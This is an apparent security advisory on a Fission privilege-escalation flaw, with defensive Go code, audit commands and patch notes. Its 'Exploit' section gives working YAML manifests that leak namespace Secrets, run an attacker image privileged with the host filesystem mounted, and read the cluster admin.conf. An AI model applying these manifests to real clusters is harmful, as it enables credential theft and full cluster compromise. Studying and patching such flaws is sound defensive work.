How CVE-2026-50563 Works
Fission is an open-source, Kubernetes-native serverless framework that simplifies the deployment of functions and applications on Kubernetes. Prior to version 1.24.0, the MessageQueueTrigger (MQT) scaler controller contained two critical privilege-escalation vulnerabilities that could be exploited by any subject able to create MQTs in a namespace.
The first primitive, Secret materialization, existed in the `getEnvVarlist` function within pkg/mqtrigger/scalermanager.go. This function read the Secret named in `Spec.Secret` using the controller's cluster-wide `secrets/get` RBAC permissions and emitted every key/value pair as an EnvVar whose `Value` field held the secret bytes in plaintext. This effectively copied the Secret's content into the connector Deployment's pod template, where anyone able to read the Deployment could see it. A subject holding only `messagequeuetriggers/create` permissions (but not `secrets/get`) could exfiltrate any Secret in the namespace by simply pointing an MQT at it.
The second primitive, PodSpec injection, was even more dangerous. `Spec.PodSpec` was merged into the controller-built connector PodSpec via `util.MergePodSpec` with no allowlist on which fields could come from the user. An MQT could substitute `Containers[].Image` (run any image), override Command/Args, inject Env, add `VolumeMounts` + Volumes, override ServiceAccountName, and set HostNetwork/HostPID/HostIPC. This turned `messagequeuetriggers/create` into effective `deployments/create` with an arbitrary image and service account.
A tenant with only `messagequeuetriggers.fission.io/create` in a namespace could read any Secret in that namespace and run an arbitrary container image under an arbitrary service account, escalating well beyond their intended RBAC. The vulnerability was patched in version 1.24.0 via PR 3367.
DailyCVE Form:
| Field | Value |
|---|---|
| Platform | Fission |
| Version | <= 1.23.x |
| Vulnerability | Privilege Escalation via Secret Materialization + PodSpec Injection |
| Severity | Critical (CVSS 9.9) |
| Date | 2026-06-10 |
| Prediction | Patch released in v1.24.0 |
What Undercode Say:
Check the Fission version:

```bash
kubectl get deployment -n fission fission-controller -o jsonpath='{.spec.template.spec.containers[0].image}'
```

List existing MessageQueueTriggers:

```bash
kubectl get messagequeuetriggers.fission.io -A
```

Inspect an MQT's `podSpec` for injected fields:

```bash
kubectl get mqt <name> -n <namespace> -o yaml | grep -A 20 "podSpec"
```
```go
// pkg/mqtrigger/scalermanager.go - vulnerable function (pre-1.24.0)
// Imports used: context, corev1 "k8s.io/api/core/v1", metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
func getEnvVarlist(secretName string, namespace string) ([]corev1.EnvVar, error) {
	// Read with the controller's own cluster-wide secrets/get permission,
	// regardless of what the MQT's creator is allowed to read.
	secret, err := kubernetesClient.CoreV1().Secrets(namespace).Get(context.TODO(), secretName, metav1.GetOptions{})
	if err != nil {
		return nil, err
	}
	var envVars []corev1.EnvVar
	// Secret values are read and emitted as literal EnvVar.Value,
	// so the plaintext lands in the connector Deployment's pod template.
	for key, val := range secret.Data {
		envVars = append(envVars, corev1.EnvVar{
			Name:  key,
			Value: string(val), // PLAINTEXT LITERAL
		})
	}
	return envVars, nil
}
```
```go
// pkg/executor/util/merge_allowlist.go - new allowlist (v1.24.0+)
var MergeAllowedPodSpecFields = []string{
	"NodeSelector",
	"Tolerations",
	"Affinity",
	"RuntimeClassName",
	"Resources", // per-container only
}
// All other user-supplied fields are dropped at the controller layer.
```
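The following is an added example, not Fission's code, showing the two halves of the fix that the vulnerable function and the allowlist above call for: emitting `SecretKeyRef` references instead of literal values, and merging a user-supplied PodSpec through an allowlist that reports what it refused. The types are simplified stand-ins for the `k8s.io/api/core/v1` shapes (an assumption made so it runs without a cluster), and the names `envVarsByRef`, `containsPlaintext` and `mergeAllowlisted` are hypothetical.

```go
package main

import (
	"fmt"
	"sort"
)

// Simplified stand-ins for the k8s.io/api/core/v1 shapes (an assumption made
// so the example runs without a Kubernetes client dependency).
type SecretKeySelector struct {
	Name string // Secret name
	Key  string // key inside Secret.Data
}
type EnvVarSource struct{ SecretKeyRef *SecretKeySelector }
type EnvVar struct {
	Name      string
	Value     string        // literal value: what the vulnerable code filled in
	ValueFrom *EnvVarSource // reference the kubelet resolves at pod start
}

// envVarsByRef (hypothetical name) is the fixed counterpart of getEnvVarlist:
// it needs only the Secret's key names and emits SecretKeyRef entries, so no
// secret bytes are ever copied into the Deployment object.
func envVarsByRef(secretName string, keys []string) []EnvVar {
	sorted := append([]string(nil), keys...)
	sort.Strings(sorted) // deterministic order keeps Deployment diffs stable
	vars := make([]EnvVar, 0, len(sorted))
	for _, k := range sorted {
		vars = append(vars, EnvVar{
			Name:      k,
			ValueFrom: &EnvVarSource{SecretKeyRef: &SecretKeySelector{Name: secretName, Key: k}},
		})
	}
	return vars
}

// containsPlaintext is the check a unit test would run on a generated pod
// template: any EnvVar carrying a literal Value means secret material leaked.
func containsPlaintext(vars []EnvVar) bool {
	for _, v := range vars {
		if v.Value != "" {
			return true
		}
	}
	return false
}

// Minimal PodSpec subset, enough to show the allowlist merge.
type Container struct {
	Name      string
	Image     string
	Command   []string
	Resources map[string]string // e.g. "cpu": "100m"
}
type PodSpec struct {
	Containers         []Container
	NodeSelector       map[string]string
	Tolerations        []string
	ServiceAccountName string
	HostNetwork        bool
	HostPID            bool
}

// mergeAllowlisted (hypothetical name) copies only allowlisted fields from
// user into base and returns the user-populated fields it refused to merge.
func mergeAllowlisted(base, user PodSpec) (PodSpec, []string) {
	out := base
	out.Containers = append([]Container(nil), base.Containers...) // don't mutate base
	var dropped []string
	if user.NodeSelector != nil {
		out.NodeSelector = user.NodeSelector
	}
	if user.Tolerations != nil {
		out.Tolerations = user.Tolerations
	}
	if user.ServiceAccountName != "" {
		dropped = append(dropped, "serviceAccountName")
	}
	if user.HostNetwork {
		dropped = append(dropped, "hostNetwork")
	}
	if user.HostPID {
		dropped = append(dropped, "hostPID")
	}
	for _, uc := range user.Containers {
		if uc.Image != "" {
			dropped = append(dropped, "containers[].image")
		}
		if len(uc.Command) > 0 {
			dropped = append(dropped, "containers[].command")
		}
		// Resources are allowed, but only onto a container the controller built.
		for i := range out.Containers {
			if out.Containers[i].Name == uc.Name && uc.Resources != nil {
				out.Containers[i].Resources = uc.Resources
			}
		}
	}
	return out, dropped
}

func main() {
	fmt.Println("plaintext leaked:", containsPlaintext(envVarsByRef("target-secret-name", []string{"password", "username"})))
	base := PodSpec{Containers: []Container{{Name: "connector", Image: "controller-built-image:example"}}}
	user := PodSpec{HostPID: true, Containers: []Container{{Name: "connector", Image: "docker.io/attacker/malicious:latest"}}}
	merged, dropped := mergeAllowlisted(base, user)
	fmt.Println(merged.Containers[0].Image, dropped) // controller image kept; image and hostPID dropped
}
```

The point of returning `dropped` rather than silently discarding fields is that the same list can drive both behaviours the patch describes: the controller drops them, and a validating webhook can reject the object by naming exactly which fields were populated.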
Exploit:
1. Secret Exfiltration
Create a malicious MessageQueueTrigger that points to a target Secret:
```yaml
apiVersion: fission.io/v1
kind: MessageQueueTrigger
metadata:
  name: secret-exfil
  namespace: victim-ns
spec:
  function:
    name: dummy-func
    namespace: victim-ns
  secret: target-secret-name   # Any Secret in the namespace
  podSpec: {}                  # Minimal, just to trigger the controller
```
The controller would read the Secret using its cluster-wide permissions and embed its values directly into the connector Deployment’s pod template as literal environment variables, exposing them in the pod spec.
2. PodSpec Injection for Container Escape
Create an MQT that overrides the connector image and runs with host privileges:
```yaml
apiVersion: fission.io/v1
kind: MessageQueueTrigger
metadata:
  name: podspec-inject
  namespace: victim-ns
spec:
  function:
    name: dummy-func
    namespace: victim-ns
  podSpec:
    containers:
      - name: connector
        image: docker.io/attacker/malicious:latest   # Attacker-controlled image
        command: ["/bin/sh"]
        args: ["-c", "cat /host/etc/kubernetes/admin.conf"]
        securityContext:
          privileged: true
        volumeMounts:
          - name: host-root
            mountPath: /host
    hostNetwork: true
    hostPID: true
    serviceAccountName: cluster-admin-sa   # If exists
    volumes:
      - name: host-root
        hostPath:
          path: /
```
Prior to v1.24.0, this MQT would be accepted and the connector pod would run with the attacker’s image, host networking, host PID namespace, and mount the host filesystem—allowing full node and cluster compromise.
Protection:
- Upgrade to Fission v1.24.0 or later; that release contains the fix.
- Secret handling: `getEnvVarlist` now emits `EnvVar.ValueFrom.SecretKeyRef`, so the connector pod resolves values at start time under its own service account. Secret values are never written into the Deployment object and never logged.
- PodSpec allowlisting: a new allowlist, `MergeAllowedPodSpecFields` (pkg/executor/util/merge_allowlist.go), accepts only `NodeSelector`, `Tolerations`, `Affinity`, `RuntimeClassName`, and per-container `Resources`. All other user-supplied fields are dropped at the controller layer, and the validating webhook rejects every populated non-allowlisted field with a clear error.
- Admission webhook: the webhook and the merge helper share a single canonical `DisallowedPodSpecFields` enumeration so they cannot drift.
- Audit existing MQTs: before upgrading, audit all MessageQueueTriggers for `spec.podSpec` fields that override image, command, args, env, volumes, service account, or host namespaces. After the upgrade these will be rejected at admission (or silently dropped if the webhook is disabled).
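The audit step above can be scripted. What follows is an added example, not Fission's code, that reads the `items` list `kubectl get mqt -A -o json` prints and reports every populated `podSpec` field outside the v1.24.0 allowlist (top-level `nodeSelector`, `tolerations`, `affinity`, `runtimeClassName`, and per-container `resources`). The function name `auditMQTList` is hypothetical and the embedded JSON is constructed sample input, not output from a real cluster.

```go
package main

import (
	"encoding/json"
	"fmt"
	"sort"
)

// JSON names of the podSpec fields the v1.24.0 allowlist keeps; "containers"
// is inspected separately because only per-container resources are allowed.
var allowedTopLevel = map[string]bool{
	"nodeSelector": true, "tolerations": true, "affinity": true,
	"runtimeClassName": true, "containers": true,
}
var allowedPerContainer = map[string]bool{"name": true, "resources": true}

// Finding names one populated non-allowlisted field in one MQT.
type Finding struct{ Namespace, Name, Field string }

// auditMQTList (hypothetical name) reads the "items" list that
// `kubectl get mqt -A -o json` prints and returns every podSpec field the
// upgraded controller would drop or the webhook would reject.
func auditMQTList(raw []byte) ([]Finding, error) {
	var list struct {
		Items []struct {
			Metadata struct{ Name, Namespace string } `json:"metadata"`
			Spec     struct {
				PodSpec map[string]json.RawMessage `json:"podSpec"`
			} `json:"spec"`
		} `json:"items"`
	}
	if err := json.Unmarshal(raw, &list); err != nil {
		return nil, err
	}
	var out []Finding
	for _, it := range list.Items {
		ns, name := it.Metadata.Namespace, it.Metadata.Name
		for key, val := range it.Spec.PodSpec {
			if !allowedTopLevel[key] {
				out = append(out, Finding{ns, name, key})
				continue
			}
			if key != "containers" {
				continue
			}
			var containers []map[string]json.RawMessage
			if err := json.Unmarshal(val, &containers); err != nil {
				return nil, err
			}
			for _, c := range containers {
				for ck := range c {
					if !allowedPerContainer[ck] {
						out = append(out, Finding{ns, name, "containers[]." + ck})
					}
				}
			}
		}
	}
	// Map iteration order is random; sort so reports are reproducible.
	sort.Slice(out, func(i, j int) bool {
		a, b := out[i], out[j]
		if a.Namespace != b.Namespace {
			return a.Namespace < b.Namespace
		}
		if a.Name != b.Name {
			return a.Name < b.Name
		}
		return a.Field < b.Field
	})
	return out, nil
}

// sampleMQTList is constructed for this example: one benign MQT and one
// carrying the overrides the page describes.
const sampleMQTList = `{"items":[
 {"metadata":{"name":"benign","namespace":"team-a"},
  "spec":{"podSpec":{"nodeSelector":{"disktype":"ssd"},
   "containers":[{"name":"connector","resources":{"limits":{"cpu":"200m"}}}]}}},
 {"metadata":{"name":"podspec-inject","namespace":"victim-ns"},
  "spec":{"podSpec":{"hostPID":true,"serviceAccountName":"cluster-admin-sa",
   "volumes":[{"name":"host-root","hostPath":{"path":"/"}}],
   "containers":[{"name":"connector","image":"docker.io/attacker/malicious:latest","command":["/bin/sh"]}]}}}
]}`

func main() {
	findings, err := auditMQTList([]byte(sampleMQTList))
	if err != nil {
		panic(err)
	}
	for _, f := range findings {
		fmt.Printf("%s/%s: non-allowlisted podSpec field %q\n", f.Namespace, f.Name, f.Field)
	}
}
```

To run it against a live cluster, replace the embedded constant with the bytes read from `kubectl get mqt -A -o json`; an empty result means every existing MQT will survive the upgrade unchanged, while each finding is a field the new controller drops and the webhook rejects.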
Impact:
- Secret Exposure: Any user with `messagequeuetriggers/create` permissions could read any Secret in their namespace, including database credentials, API keys, TLS certificates, and service account tokens.
- Container Escape & Node Compromise: Attackers could run arbitrary container images with `privileged: true`, `hostNetwork`, `hostPID`, and `hostIPC`, mounting the host filesystem and escaping the container sandbox.
- Cluster-wide Compromise: By overriding `serviceAccountName` to a privileged service account (e.g., cluster-admin), attackers could gain full cluster administrative access.
- RBAC Bypass: The vulnerability effectively turned `messagequeuetriggers/create` into `deployments/create` with an arbitrary image and service account, completely bypassing intended RBAC boundaries.
- Persistent Backdoor: Attackers could establish persistent malicious connectors that continue to run even after the initial exploit, providing ongoing access to the cluster.
Sources:
Reported By: github.com